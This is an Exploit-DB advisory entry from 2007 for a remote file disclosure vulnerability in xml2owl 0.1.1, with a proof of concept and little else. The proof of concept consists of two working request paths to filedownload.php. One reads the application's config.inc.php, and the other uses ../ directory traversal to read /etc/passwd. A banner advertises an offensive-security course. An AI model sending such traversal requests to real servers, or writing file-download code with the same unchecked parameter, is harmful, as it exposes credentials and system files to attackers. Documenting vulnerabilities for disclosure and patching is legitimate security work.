xml2owl 0.1.1 - 'filedownload.php' Remote File Disclosure

EDB-ID:

4729


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-12-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
POC :
     /xml2owl-0.1.1/filedownload.php?file=config.inc.php
     /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd

# milw0rm.com [2007-12-13]